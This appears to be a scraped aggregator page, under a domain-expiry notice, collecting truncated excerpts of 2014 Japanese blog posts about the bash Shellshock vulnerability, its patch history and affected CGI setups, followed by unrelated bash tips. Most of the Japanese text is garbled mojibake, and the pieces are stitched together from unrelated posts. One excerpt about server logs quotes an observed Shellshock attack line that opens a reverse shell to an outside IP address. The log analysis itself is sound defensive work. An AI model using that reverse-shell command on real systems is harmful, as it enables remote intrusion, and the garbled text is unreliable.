If this is your domain name you must renew it immediately before it is deleted and permanently removed from your account. To renew this domain name visit NameBright.com
10æã«å ¥ãã9æã¾ã§ã«èµ·ãã£ããã¨ããã£ã¨æ¯ãè¿ãã¨ãããé¡ãã©ããããèããã¦ããã®ã§ããâ ãããâ¦â¦ãã¨ããæãã§æ¯ãè¿ã£ã¦ã¿ããã¨ã¨ãã¾ãã ããã1é±éç¨åº¦ã§Bashãå¤§å¹ ãªé²åãéãããï½Shellshock大æ´ãï½ ã¾ã ç¾å¨é²è¡å½¢ã®äºæ¡ã§ã¯ããã¾ããã9æä¸æ¬ã«çºè¦ããBashã®èå¼±æ§ã«èµ·å ãã¦ã10æä¸æ¬ã¾ã§ã¾ã åæãã¦ããªãShellshockã Bash 4.3ã®ä¾ã§èª¬æããã¨ãPatchlevel 25ï½30ã¾ã§ã¯ä»¥ä¸ã®ãããªè»è·¡ããã©ã£ã¦ãã¾ãã 9æ24æ¥ã«Patchlevel 25 9æ26æ¥ã«Patchlevel 26 9æ27æ¥ã«Patchlevel 27 10æ1æ¥ã«Patchlevel 28 10æ2æ¥ã«Patchlevel 29 10æ5æ¥ã«Patchlevel 30 ãã®éã«çºè¦ãä¿®æ£ãããèå¼±æ§ã¯ãCVE-2014-6271ãCVE-2014-71
Tweet å é±å ¬éããã bash ã®èå¼±æ§ã«ã¤ãã¦ã管çããã¦ãããµã¼ãã¼ã¸ã®å½±é¿ãæ°ã«ããã¦ããæ¹ãå¤ãã¨æãã¾ããããã§ç·æ¥ã³ã©ã ã¨ãã¦ãå½±é¿ç¯å²ã®èª¿æ»æ¹æ³ã«ã¤ãã¦ç´¹ä»ãã¾ãã bash ã¯é常ã«å¤ãã®å ´é¢ã§ä½¿ç¨ããã¦ããããã°ã©ã ã§ããããã bash ãå¼ã³åºãå¯è½æ§ã®ããããã°ã©ã ãå ´é¢ãã½ã¼ã¹ã³ã¼ã解æã«ããåæãããã¨ã¯å°é£ã§ããã¾ããè¨å®ãã¡ã¤ã«ã§ã®æå®å 容ãªã©ã«ãä¾åããå¯è½æ§ããããæç« ã§ã®ãååãã«ããæ¼ãã®ç¡ãç確ãªå¤æãã§ãããã©ããä¸å®ãæ®ãã¾ãã Red Hat Enterprise Linux ï¼ RHEL ï¼ã«ã¯ SELinux ã¨ããã»ãã¥ãªãã£ãå¼·åããããã®æ©è½ãæè¼ããã¦ãã¾ããããããèå¼±æ§ã®åé¡ã«éãããã·ã¹ãã ã®ãã©ãã«äºé²ã¨é©åãªå¯¾å¦ãè¡ãä¸ã§ã¯ã対象ã¨ãªãã·ã¹ãã ã®è¨å®ãæåãäºåã«ææ¡ãã¦ãããã¨ãéè¦ã§ããã¨èãã¾ãã ä»åã®èå¼±
bashã®èå¼±æ§"shellshock"ãé常ã«è©±é¡ã«ãªã£ã¦ããã¾ããããããããããã¨äºæ ãå ¥ãçµãã§ããå ¨å®¹ãã¤ãã¿ã¥ããã ã¨ãããã¨ã§ããã§ã¯å ¨å®¹ãç解ããã®ãæ©ã ã«æ¾æ£ãã¦ã以ä¸ã®ã¬ã¬ã·ã¼ç°å¢ã«çµã£ãçã話ããã¾ããã¬ã¬ã·ã¼ã¨ã¯è¨ã£ã¦ãããããªãã«éæ¿ã®æ§æãªã®ã§å¯¾è±¡è ã¯å¤ãã®ã§ã¯ç¡ãã§ãããããç§ã¯è害ãªã®ã§ãPerlããåãããªãã®ã§ããPHPã¯å«ãã CentOS(Red Hat) 6 or 7 Perlã®CGIã®å é¨ã§ãsystem()ã使ã£ã¦ããã (CGIã¨ãã¦åä½ããã¦ãããmod_perlãPSGI/Plackã¯ä½¿ã£ã¦ããªãï¼ ãªããshellshockèªä½ã®è§£èª¬ã¯ããã§ã¯è¡ãã¾ããã åºç¤ç¥èï¼CentOSã®/bin/sh ã¯ããã«ã/bin/shã¨bashã®é¢ä¿ã«ã¤ãã¦äºåç¥èãç¥ã£ã¦ããå¿ è¦ãããã¾ãã ç¾å¨ã®CentOSããã³Red Hat Linuxã«ã
GNU Project ãæä¾ãã bash ã¯ãLinux ãªã© UNIX 系㮠OS ã«å«ã¾ããã³ãã³ããå®è¡ããããã®ã·ã§ã«ï¼OS ã®ä¸é¨ã¨ãã¦ããã°ã©ã ã®èµ·åãå¶å¾¡ãªã©ãè¡ãããã°ã©ã ï¼ã§ãã bash ã«ä»»æã® OS ã³ãã³ããå®è¡ãããèå¼±æ§ (CVE-2014-6271) ãçºè¦ããã2014 å¹´ 9 æ 24 æ¥ã«ä¿®æ£ããããå ¬éããã¾ããã ãã ããCVE-2014-6271ã¸ã®ä¿®æ£ãä¸ååã§ããã¨ããæ å ±ãããã¾ãããã®ä¿®æ£ãä¸ååã§ãããã¨ã«ããèå¼±æ§ (CVE-2014-7169) ã«å¯¾å¿ããã¢ãããã¼ãã¾ãã¯ããããåãã³ãããé æ¬¡å ¬éããã¦ãã¾ãã bash ã使ç¨ã㦠OS ã³ãã³ããå®è¡ããã¢ããªã±ã¼ã·ã§ã³ãä»ãã¦ãé éããä»»æã® OS ã³ãã³ããå®è¡ãããå¯è½æ§ãããã¾ãã å³ï¼èå¼±æ§ãæªç¨ããæ»æã®ã¤ã¡ã¼ã¸ è¦å¯åºã«ããã¨æ¬èå¼±æ§ãæ¨çã¨ããã¢ã¯ã»ã¹ã観
件ã®bashã®èå¼±æ§ãæ®ã£ã¦ãããã¨ãæå¾ ããã¢ã¯ã»ã¹ã«ã¤ãã¦ã24æéã»ã©åã«ã¯æ¥ã¦ãªãã£ããã§ãããããã»ã©ãã°ãè¦ã¦ã¿ããã¡ãã£ã¨ã ãæ¥ã¦ã¾ããã ãã°ã«æ®ãã®ã¯ User-Agent ããããªã®ã§ãããã»ãã®ãã£ã¼ã«ãã§è©¦ãã¦ãã輩ããããã¨ã§ãããã ã¢ã¯ã»ã¹å ãéå¼ããã¦ã¿ããã§ãããã¯ã©ã¦ããµã¼ãã¹ã°ã£ããã§ããï¼ä¸åã ã shodan.io ãªããã¡ã¤ã³ã®ä¸ã®IPã¢ãã¬ã¹ãããã£ãã®ã ãã©ããªãã ããâ¦â¦ï¼ã ãã¦ã() { :;}; ã®å¾ã«ãªã«ããã£ã¦ãã®ããã¨ããã®ãªãã§ãããä¸ã¤ THIS IS VULNERABLE 㨠echo ããã ãã¨ãã人ããã¾ãããè¦åã®ã¤ãããªã®ããæåã§ä½ã確èªãã¦ããã®ããªããã¨ã¯pingã ãªâ¦â¦ã¨æã£ã¦ããã§ãããã¡ãã£ã¨ç¹ç°ãªãã®ãã /bin/bash -i > /dev/tcp/198.206.15.239/8081 0>&1
[NEW] 2014/09/30: ã¢ãã©ã¤ã¢ã³ã¹ã®å¯¾å¿ç¶æ³ã¾ã¨ããéææ´æ°ä¸ CVE-2014-6271åã³CVE-2014-7169ãã(Bashèå¼±æ§)ã ä¸éã§ã¯ãå¤é¨å ¬éãµã¼ãã¼(ç¹ã«Webãµã¼ãã¼)ã¸ã®å¯¾å¦ãçã ã¨é²ãããã¦ãã¾ããWebãµã¼ãã¼ã ãã§ãªããã¡ã¼ã«ãµã¼ãã¼ã¸ã®æ»æãã¿ã¼ã³ãæ©æã«è¦ä»ãã£ã¦ãã¾ããå¤é¨å ¬éãµã¼ãã¼ã«å¯¾ããç·åçãªç¹æ¤ãè¿ããã¡ã«é²ãã§ãããã®ã¨æããã¾ãã bash Shellshock through MAIL .forward / qmail-alias piping (ML program etc.) CVE-2014-6271 http://t.co/QPbSE8dppM http://t.co/AFuHudkCdh September 26, 2014ããããä¸è¬çãªãµã¼ãã¼é¡ã ãã§ãªã主ã«ãã¡ã¤ã¢ã¦ã©ã¼ã«ã®å é¨ã«è¨ç½®ããã¦ããã¢ãã©ã¤
2014/09/26ãã³ã¼ã¹ï¼å ç¥ãã£ã¦ã ãå ç¥ãã£ã¦ããè¨äºã¯ãããã¨ã¼ã¸ã§ã³ãæ§ããã°[netagent-blog.jp]ã«æ²è¼ããã¦ããè¨äºã§ãããç¾å¨ãããã¨ã¼ã¸ã§ã³ãã«å¨ç±ãã¦ããªãã©ã¤ã¿ã¼ã®è¨äºãå«ã¿ã¾ãã bashã«ãããèå¼±æ§ãShellshockãã«ã¤ã㦠LinuxãMac OS Xãªã©ã®UNIXç³»OSã§åºã使ç¨ããã¦ããbashã«è¦ã¤ãã£ãèå¼±æ§(Shellshockã¨å¼ã°ãã¦ãã¾ã)ãå æ¥ãã話é¡ã«ãªã£ã¦ãã¾ãã å¼ç¤¾ã§ããã®bashã®èå¼±æ§ã«ã¤ãã¦èª¿æ»ãè¡ãã¾ããã â æ¦è¦ ç°å¢å¤æ°ã«ç¹å®ã®æååãè¨å®ããã ãã§ãã®ç°å¢å¤æ°å ã®æååãã·ã§ã«ãé¢æ°ã¨ãã¦å®è¡ãã¦ãã¾ãã¾ãã ã·ã§ã«ãéãã¦ã³ãã³ãçãå®è¡ããå¹ åºãç°å¢ã§å½±é¿ãããã¾ãããç¹ã«é¡èã«å½±é¿ãåããã®ã¯CGIçã®Webã¢ããªã±ã¼ã·ã§ã³ç°å¢ã§ãã CGIãã¯ããã¨ããWebã¢ããªã±ã¼ã·ã§ã³ã§ã¯Webãã©
2014-09-27: 該å½ãµã¤ãä¸ã«XSSããªãã¦ãæ»æå¯è½ã§ãããã¨ã id:mayuki ããã®ã³ã¡ã³ãã§å¤æãã¾ããã®ã§å ¨é¢çã«æ¸ãç´ãã¾ããããã¡ã¤ã¢ã¦ã©ã¼ã«å ã§ãã£ã¦ãæ»æè ã¯ãã¡ã¤ã¢ã¦ã©ã¼ã«å ã®Shellshockæ»æãéç¨ããCGIã®URLãããã£ã¦ããã ãã§æ»æå¯è½ã§ãã®ã§æ©æ¥ã«å¯¾å¿ãå¿ è¦ã§ãï¼ä¼ç¤¾ã®ããã°ã«ãæ¸ãã¦ã¾ããããã¡ã¤ã¢ã¦ã©ã¼ã«å ã«ç½®ãã¦ãããµã¼ãã§æ»æè ãç´æ¥ã¢ã¯ã»ã¹ã§ããªãããã¨ãã£ã¦bashã®æ´æ°ãæ ã£ã¦ããã¨ãæ¡ä»¶ã«ãã£ã¦ã¯æ»æãå¯è½ã¨ãªãã¾ãã æ¡ä»¶ã¨ãã¦ã¯ã ãã®ãµã¼ãã«ã¯ã·ã§ã«ãçµç±ãã¦å¤é¨ã³ãã³ããèµ·åããCGIçãåãã¦ãã(é常ã®Shellshockã®æ»æã¨åæ¡ä»¶) æ»æè ããã®URLãäºåã«ç¥ã£ã¦ãã(ãããã¯æ¨æ¸¬å¯è½) ã¨ãªãã¾ãã æ»æè ã¯ãã¦ã¼ã¶ã¼ãç½ URLã¸èªå°ãã以ä¸ã®ãããªJavaScriptãç½ ãã¼ã¸ä¸ã§åãããæ»æ対象ã®W
æ¡ä»¶1. /bin/shã®å®ä½ãbashã®ãã£ã¹ããªãã¥ã¼ã·ã§ã³ RHEL CentOS Scientific Linux Fedora Amazon Linux openSUSE Arch Linux (èªãè¨å®ããå ´å: Debian, Ubuntu) æ¡ä»¶2. åä½ç°å¢ CGI (ã¬ã³ã¿ã«ãµã¼ãã§ãããã¡ãªCGIã¢ã¼ãã®PHPçãå«ã) Passenger(Ruby) æ¡ä»¶3. ããã°ã©ã å 容 Passengerã¯å ¨æ»äº¡ *1 systemã `command`ã '| /usr/lib/sendmail' ãªã©ã§å¤é¨ã³ãã³ãå®è¡ *2 PHPã®mailãmb_send_mailããã®ä»ãã¬ã¼ã ã¯ã¼ã¯çãä»ããã¡ã¼ã«éä¿¡ *3 以ä¸ã¯æ¡ä»¶1ãä¸è¦ æ示çã«bashãå¼ã¶ å é 㧠#!/bin/bash ã #!/usr/bin/env bash ãã¦ããããã°ã©ã ãå®è¡ (rbenv
ç°å¢å¤æ°ã«ä»è¾¼ã¾ããã³ã¼ããå®è¡ãã¦ãã¾ãBASHã®èå¼±æ§ã CGIã¹ã¯ãªããã«å½±é¿ãä¸ããã試ãã¦ã¿ããçµæã¯æ²æ¨ãªæãã« Tweet 2014å¹´9æ25æ¥ å¶ç°å¤§è²´ ãã®è¨äºã¯2014å¹´ã®ãã®ã§ã æãã Bash specially-crafted environment variables code injection attack ãªããã®ã§é¨ãã«ãªã£ã¦ããã®ã§ããã£ããæå ã® Apacheã§è©¦ãã¦ã¿ã¾ããã /hoge.cgiã¨ããURIã§å®è¡ãããããã«ãä¸è¡ã®ã¡ãã»ã¼ã¸ãåºåããã ãã® CGIã¹ã¯ãªãããè¨ç½®ãã¾ãããã£ããããªãã®å ¥åãã¯ã©ã¤ã¢ã³ãå´ããåãä»ãã¦ããªãããå±éºã®ããããããªãè¦ãã¾ãã #!/bin/sh echo "Content-type: text/plain" echo echo "Hi! I'm an ordinary CGI script w
次åï¼ãbashããªãã¤ã¬ã¯ãã¨ãã¤ããç解ããï¼ï¼ï¼ æ®æ®µãªã«ããªããªãã¤ã¬ã¯ãããã¤ãã使ã£ã¦ãã¾ãããåå¼·ãå ¼ãã¦ã¾ã¨ãã¦ã¿ã¾ãã â»é·ããªããããªã®ã§é©å½ã«è¤æ°åã«åãã¾ãã æ¨æºå ¥åºå æ¨æºå ¥åºåã¨ã¯ã³ãã³ãã«ä¸ããããããã¼ã¿ã¹ããªã¼ã å ¥åºåã«é¢ããã¤ã³ã¿ã¼ãã§ã¼ã¹ã®ãã¨ã§ãã æ¨æºå ¥åºåã«ã¯ä»¥ä¸ã®3ã¤ãããã¾ãã ååããã©ã«ããã¡ã¤ã«ãã£ã¹ã¯ãªãã¿(FD) æ¨æºå ¥åãã¼ãã¼ã0 æ¨æºåºåç»é¢1 æ¨æºã¨ã©ã¼åºåç»é¢2 æ¨æºå ¥åã¯ã³ãã³ãã¸ã®å ¥åã¹ããªã¼ã ã§ããã¼ãã¼ãããã®å ¥åã§ãã æ¨æºåºåã¯ã³ãã³ãããã®åºåã¹ããªã¼ã ã§ãã¨ã©ã¼é¢ä¿ä»¥å¤ã®ã¡ãã»ã¼ã¸ã端æ«ç»é¢ã«åºåãã¾ãã æ¨æºã¨ã©ã¼åºåã¯æ¨æºåºåã¨åæ§ã«ã³ãã³ãããã®åºåã¹ããªã¼ã ã§ããã ã¨ã©ã¼é¢ä¿ã®ã¡ãã»ã¼ã¸ã端æ«ç»é¢ã«åºåããç¹ãç°ãªãã¾ãã ãã¡ã¤ã«ãã£ã¹ã¯ãªãã¿(FD) FDã¯ã³ãã³ããå¤é¨ãªã½ã¼ã¹ã¨éä¿¡ããã
You type in commands. Bash executes them. Unix users spend a lot of time manipulating files at the shell. As a shell, it is directly available via the terminal in both Mac OS X (Applications > Utilities) and Linux/Unix. At the same time, bash is also a scripting language: Bash scripts can automate routine or otherwise arduous tasks involved in systems administration. Why use bash? Here are example
ãæ¸ãã¦ããã以ä¸è§£èª¬ã set -e ã¨ã©ã¼ããã£ããã·ã§ã«ã¹ã¯ãªãããããã§æã¡æ¢ãã«ãã¦ãããï¼exit 0以å¤ãè¿ããã®ããã£ããæ¢ã¾ãããã«ãªãï¼ãããã£ããããã§ãã¾ããã£ã¦ãªããããã¼ã¿æºåã§ãã¦ãªãã®ã«ããããã£ããããã¦ï¼ãã£ã¦ãªãã®ãé²ããã set -u æªå®ç¾©ã®å¤æ°ã使ããã¨ããã¨ãã«æã¡æ¢ãã«ãã¦ããããPerlã§ããuse strict 'vars';çãªãã®ã ã£ã¦æ°è»½ãªæ°æã¡ã§æ¸ãã¦ãã¾ã£ã¦ãããããããæéãããã¨æã£ããã¹ãã«ãã¹ãããªã«ããããããã£ã¦ãªãã®ãé²ããã ä¸é¨ã ãä¾å¤ã«ããã ã¯ã¦ãªããã¯ãã¼ã¯ã®ã³ã¡ã³ããã -e 㯠command1 || command2 ã¿ãããªãã¨ãåºæ¥ãªããªãã®ä½¿ããã¨ãªããªã-uã¯ä»ãã¨ãã¦è¯ããã 確ãã«ãã£ãããã¨ããã§ãããã³ãã³ãã®å¤±æãèæ ®ãã¦æ¸ãã¦ããé¨åã«ã¤ãã¦ã¯ï¼ãããã¯ãããexit 0以å¤
ãã¤ã¾ã§çµã£ã¦ãçµãããªããã帰ããªã⦠éä¸ã§çµäºãã¦ãã¾ãã¨å°ãã®ã§ããã°ã¢ã¦ããã¦ãçµäºããªãããã«ã ä½æ¥ã®æµã Ctrl+Zã§ã³ãã³ãã®ä¸æ bgã§ããã¯ã°ã©ã¦ã³ãã«åã jobsã§ã¸ã§ãã®ç¢ºèª disownã§ãã°ã¢ã¦ããã¦ãå®è¡ãããããã«ãã å®éã®ã³ãã³ãã ã¨
ç§ã¯ã·ã§ã«ã¹ã¯ãªããã®å¤§ãã¡ã³ã§ãä»äººã®ã¹ã¯ãªããããé¢ç½ãæ¹æ³ãå¦ã¶ã®ã大好ãã ãæè¿ãSSHãµã¼ãã®2è¦ç´ èªè¨¼ãç°¡åã«ããããã®authy-sshã¹ã¯ãªããã«åºä¼ã£ãããã®ã¹ã¯ãªãã群ãè¦ã¾ããã¦ãã¦ãã¿ããªã¨å ±æãããããããã®ã¯ã¼ã«ãªãã¨ãè¦ã¤ããã åºåã«è²ä»ããã åºåæååããæåããæã¯ç·ã«ã失æããæã¯èµ¤ã«ãè¦åã¯é»è²ã«è²ã¥ããããã¨æããã¨ã¯ããããããã ããã NORMAL=$(tput sgr0) GREEN=$(tput setaf 2; tput bold) YELLOW=$(tput setaf 3) RED=$(tput setaf 1) function red() { echo -e "$RED$*$NORMAL" } function green() { echo -e "$GREEN$*$NORMAL" } function yellow() { e
@hirose31 ããããã·ã§ã«ã¹ã¯ãªããã§ããã£ã件âãåãã¹ãããªåé¿æ¹æ³ãã§ãé¡ãåºããã¦ãã¦ãããã«åçãã¦ã¿ã¾ããã ãã®å 容ã¯ãªã³ã¯å ãè¦ã¦ãããã¨ãã¦ãåçã®ä¸ã§ä½¿ã£ãbashã®ããã»ã¹ç½®æã«ã¤ãã¦æ¸ãããè¨äºããã¾ãè¦ãªãã®ã§ãåçã§ä½¿ã£ãããã»ã¹ç½®æã®ãã¨ãã¨ã³ããªã«ãã¦ã¿ããã¨æãã¾ãã æåã«æ³¨æç¹ã§ãããããã»ã¹ç½®æã®æ©è½ã¯ãbashãzsh*1ã®æ©è½ã§POSIXäºæã®æ©è½ã§ã¯ããã¾ããããã®ããã使ç¨æã«ã¯ã対å¿ãã¦ããªãã·ã§ã«ã§ã¯ä½¿ãã¾ããããbashã§ä½¿ãå ´åã /bin/sh ã§ã¯ãªã /bin/bash ãæ示çã«æå®ããå¿ è¦ãããã¾ãããã¨ãã°ãããã»ã¹ç½®æã使ã£ãã¹ã¯ãªãããscript.shãã«å¯¾ãã¦"$ bash script.sh" ã¨ããã³ãã³ãã¯æåãã¾ããã"$ sh script.sh" ã¨ããã³ãã³ãã¯å¤±æãã¾ãããã®è¾ºãã®éãã¯ã/
ãªãªã¼ã¹ãé害æ å ±ãªã©ã®ãµã¼ãã¹ã®ãç¥ãã
ææ°ã®äººæ°ã¨ã³ããªã¼ã®é ä¿¡
å¦çãå®è¡ä¸ã§ã
j次ã®ããã¯ãã¼ã¯
kåã®ããã¯ãã¼ã¯
lãã¨ã§èªã
eã³ã¡ã³ãä¸è¦§ãéã
oãã¼ã¸ãéã
{{#tags}}- {{label}}
{{/tags}}